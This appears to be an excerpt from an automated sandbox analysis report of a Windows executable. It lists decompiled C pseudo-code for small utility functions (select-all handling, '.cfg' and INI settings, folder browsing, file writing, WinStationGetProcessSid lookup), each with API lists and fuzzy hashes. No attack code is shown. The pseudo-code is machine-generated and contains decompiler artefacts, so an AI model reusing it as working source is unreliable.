                                                                                                                • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                • String ID: $
                                                                                                                • API String ID: 2498372239-3993045852
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                				int _t14;
                                                                                                                
                                                                                                                				if(_a8 == 0x100 && _a12 == 0x41) {
                                                                                                                					GetKeyState(0xa2);
                                                                                                                					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
                                                                                                                						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
                                                                                                                							_t14 = E00403A60(0xa5);
                                                                                                                							if(_t14 == 0) {
                                                                                                                								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
                                                                                                                			}





                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                  • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: State$CallMessageProcSendWindow
                                                                                                                • String ID: A
                                                                                                                • API String ID: 3924021322-3554254475
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                                                                                                				intOrPtr _v20;
                                                                                                                				char _v1072;
                                                                                                                				void _v3672;
                                                                                                                				char _v4496;
                                                                                                                				intOrPtr _v4556;
                                                                                                                				char _v4560;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr* _t41;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				_t45 = __eflags;
                                                                                                                				E0040B550(0x11cc, __ecx);
                                                                                                                				E00402923( &_v4560);
                                                                                                                				_v4560 = 0x40db44;
                                                                                                                				E00406670( &_v4496, _t45);
                                                                                                                				_v4496 = 0x40dab0;
                                                                                                                				memset( &_v3672, 0, 0x10);
                                                                                                                				E0040A909( &_v1072);
                                                                                                                				_t41 = _a4;
                                                                                                                				_v4556 = 0x71;
                                                                                                                				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
                                                                                                                					L0040B266();
                                                                                                                					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
                                                                                                                				}
                                                                                                                				_v4496 = 0x40dab0;
                                                                                                                				_v4560 = 0x40db44;
                                                                                                                				E004067AC( &_v4496);
                                                                                                                				return E00402940( &_v4560);
                                                                                                                			}














                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                  • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                • memset.MSVCRT ref: 00403537
                                                                                                                • _ultow.MSVCRT ref: 00403575
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@$memset$_ultow
                                                                                                                • String ID: cf@$q
                                                                                                                • API String ID: 3448780718-2693627795
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 83%
                                                                                                                			E00402F31(void* _a4) {
                                                                                                                				void _v530;
                                                                                                                				long _v532;
                                                                                                                				void* __edi;
                                                                                                                				wchar_t* _t15;
                                                                                                                				intOrPtr _t18;
                                                                                                                				short* _t19;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_v532 = _v532 & 0x00000000;
                                                                                                                				memset( &_v530, 0, 0x208);
                                                                                                                				E00404AD9( &_v532);
                                                                                                                				_t15 = wcsrchr( &_v532, 0x2e);
                                                                                                                				if(_t15 != 0) {
                                                                                                                					 *_t15 =  *_t15 & 0x00000000;
                                                                                                                				}
                                                                                                                				wcscat( &_v532, L".cfg");
                                                                                                                				_t18 =  *0x40fa74; // 0x4101c8
                                                                                                                				_t19 = _t18 + 0x5504;
                                                                                                                				_t36 =  *_t19;
                                                                                                                				_pop(_t29);
                                                                                                                				if( *_t19 != 0) {
                                                                                                                					E00404923(0x104,  &_v532, _t19);
                                                                                                                					_pop(_t29);
                                                                                                                				}
                                                                                                                				return E00402FC6(_t29, _t36,  &_v532);
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00402F51
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                • wcscat.MSVCRT ref: 00402F8A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                • String ID: .cfg
                                                                                                                • API String ID: 776488737-3410578098
                                                                                                                • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				void _v514;
                                                                                                                				signed short _v516;
                                                                                                                				void _v1026;
                                                                                                                				signed short _v1028;
                                                                                                                				void* __esi;
                                                                                                                				void* _t17;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				signed short* _t28;
                                                                                                                
                                                                                                                				_v516 = _v516 & 0x00000000;
                                                                                                                				_t26 = __ecx;
                                                                                                                				memset( &_v514, 0, 0x1fc);
                                                                                                                				_v1028 = _v1028 & 0x00000000;
                                                                                                                				memset( &_v1026, 0, 0x1fc);
                                                                                                                				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
                                                                                                                				_t28 =  &_v516;
                                                                                                                				E00407250(_t28, _t17);
                                                                                                                				_push(_t28);
                                                                                                                				_push(L"</%s>\r\n");
                                                                                                                				_push(0xff);
                                                                                                                				_push( &_v1028);
                                                                                                                				L0040B1EC();
                                                                                                                				return E00407343(_t26, _a4,  &_v1028);
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00407E48
                                                                                                                • memset.MSVCRT ref: 00407E5F
                                                                                                                  • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                  • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                • String ID: </%s>
                                                                                                                • API String ID: 3400436232-259020660
                                                                                                                • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                				void _v8198;
                                                                                                                				short _v8200;
                                                                                                                				void* _t9;
                                                                                                                				void* _t12;
                                                                                                                				intOrPtr _t19;
                                                                                                                				intOrPtr _t20;
                                                                                                                
                                                                                                                				_t19 = __ecx;
                                                                                                                				_t9 = E0040B550(0x2004, __ecx);
                                                                                                                				_t20 = _t19;
                                                                                                                				if(_t20 == 0) {
                                                                                                                					_t20 =  *0x40fe24; // 0x0
                                                                                                                				}
                                                                                                                				_t25 =  *0x40fb90;
                                                                                                                				if( *0x40fb90 != 0) {
                                                                                                                					_v8200 = _v8200 & 0x00000000;
                                                                                                                					memset( &_v8198, 0, 0x2000);
                                                                                                                					_push(_t20);
                                                                                                                					_t12 = 5;
                                                                                                                					E00405E8D(_t12);
                                                                                                                					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
                                                                                                                						SetWindowTextW(_a4,  &_v8200);
                                                                                                                					}
                                                                                                                					return EnumChildWindows(_a4, E00405DAC, 0);
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 1523050162-4135340389
                                                                                                                • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                				struct HINSTANCE__* _t11;
                                                                                                                				struct HINSTANCE__** _t14;
                                                                                                                				struct HINSTANCE__* _t15;
                                                                                                                
                                                                                                                				_t14 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                                                					_t11 = E00405436(L"winsta.dll");
                                                                                                                					 *_t14 = _t11;
                                                                                                                					if(_t11 != 0) {
                                                                                                                						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t15 = _t14[1];
                                                                                                                				if(_t15 == 0) {
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                                                				}
                                                                                                                			}







                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                • API String ID: 946536540-379566740
                                                                                                                • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _t21;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t24;
                                                                                                                				signed int _t31;
                                                                                                                				void* _t33;
                                                                                                                				void* _t44;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t48;
                                                                                                                				signed int _t51;
                                                                                                                				int _t52;
                                                                                                                				void** _t53;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_t53 = __esi;
                                                                                                                				_t1 =  &(_t53[1]); // 0x0
                                                                                                                				_t51 =  *_t1;
                                                                                                                				_t21 = 0;
                                                                                                                				if(_t51 <= 0) {
                                                                                                                					L4:
                                                                                                                					_t2 =  &(_t53[2]); // 0x8
                                                                                                                					_t33 =  *_t53;
                                                                                                                					_t23 =  *_t2 + _t51;
                                                                                                                					_t46 = 8;
                                                                                                                					_t53[1] = _t23;
                                                                                                                					_t24 = _t23 * _t46;
                                                                                                                					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                                					L0040B26C();
                                                                                                                					_t10 =  &(_t53[1]); // 0x0
                                                                                                                					 *_t53 = _t24;
                                                                                                                					memset(_t24, 0,  *_t10 << 3);
                                                                                                                					_t52 = _t51 << 3;
                                                                                                                					memcpy( *_t53, _t33, _t52);
                                                                                                                					if(_t33 != 0) {
                                                                                                                						_push(_t33);
                                                                                                                						L0040B272();
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                                				} else {
                                                                                                                					_t44 =  *__esi;
                                                                                                                					_t48 = _t44;
                                                                                                                					while( *_t48 != 0) {
                                                                                                                						_t21 = _t21 + 1;
                                                                                                                						_t48 = _t48 + 8;
                                                                                                                						_t58 = _t21 - _t51;
                                                                                                                						if(_t58 < 0) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					_t31 = _t21 << 3;
                                                                                                                					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                                					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                                				}
                                                                                                                				L7:
                                                                                                                				return 1;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865533344-0
                                                                                                                • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 35%
                                                                                                                			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                                				char _v16390;
                                                                                                                				short _v16392;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr* _t30;
                                                                                                                				intOrPtr* _t34;
                                                                                                                				signed int _t36;
                                                                                                                				signed int _t37;
                                                                                                                
                                                                                                                				_t30 = __ecx;
                                                                                                                				E0040B550(0x4004, __ecx);
                                                                                                                				_push(0x4000);
                                                                                                                				_push(0);
                                                                                                                				_v16392 = 0;
                                                                                                                				_t34 = _t30;
                                                                                                                				_push( &_v16390);
                                                                                                                				if(_a4 == 0) {
                                                                                                                					memset();
                                                                                                                					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t37 =  ~_t36;
                                                                                                                					E004051B8( &_v16392, _t34, _a16);
                                                                                                                				} else {
                                                                                                                					memset();
                                                                                                                					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                                                					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                                				}
                                                                                                                				return _t37;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409E08
                                                                                                                  • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                                  • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                                • memset.MSVCRT ref: 00409E3B
                                                                                                                • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1127616056-0
                                                                                                                • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                                                				void* _v8;
                                                                                                                				wchar_t* _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				char _v40;
                                                                                                                				long _v564;
                                                                                                                				char* _t18;
                                                                                                                				char* _t22;
                                                                                                                				wchar_t* _t23;
                                                                                                                				intOrPtr* _t24;
                                                                                                                				intOrPtr* _t26;
                                                                                                                				intOrPtr _t30;
                                                                                                                				void* _t35;
                                                                                                                				char* _t36;
                                                                                                                
                                                                                                                				_t18 =  &_v8;
                                                                                                                				_t30 = 0;
                                                                                                                				__imp__SHGetMalloc(_t18);
                                                                                                                				if(_t18 >= 0) {
                                                                                                                					_v40 = _a4;
                                                                                                                					_v28 = _a8;
                                                                                                                					_t22 =  &_v40;
                                                                                                                					_v36 = 0;
                                                                                                                					_v32 = 0;
                                                                                                                					_v24 = 4;
                                                                                                                					_v20 = E0040AC81;
                                                                                                                					_v16 = __esi;
                                                                                                                					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                                                					_t36 = _t22;
                                                                                                                					if(_t36 != 0) {
                                                                                                                						_t23 =  &_v564;
                                                                                                                						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                                                						if(_t23 != 0) {
                                                                                                                							_t30 = 1;
                                                                                                                							wcscpy(__esi,  &_v564);
                                                                                                                						}
                                                                                                                						_t24 = _v8;
                                                                                                                						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                                                						_t26 = _v8;
                                                                                                                						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t30;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3917621476-0
                                                                                                                • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                                				long _v8;
                                                                                                                				long _v12;
                                                                                                                				long _t13;
                                                                                                                				void* _t14;
                                                                                                                				struct HWND__* _t24;
                                                                                                                
                                                                                                                				_t24 = GetDlgItem(_a4, _a8);
                                                                                                                				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                                				_v12 = _t13;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_t13 <= 0) {
                                                                                                                					L3:
                                                                                                                					_t14 = 0;
                                                                                                                				} else {
                                                                                                                					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                                						_v8 = _v8 + 1;
                                                                                                                						if(_v8 < _v12) {
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							goto L3;
                                                                                                                						}
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                                					_t14 = 1;
                                                                                                                				}
                                                                                                                				L4:
                                                                                                                				return _t14;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00404A52
                                                                                                                • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                                				long _v8;
                                                                                                                				void _v8199;
                                                                                                                				char _v8200;
                                                                                                                
                                                                                                                				E0040B550(0x2004, __ecx);
                                                                                                                				_v8200 = 0;
                                                                                                                				memset( &_v8199, 0, 0x1fff);
                                                                                                                				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004072FD
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                • strlen.MSVCRT ref: 00407328
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp
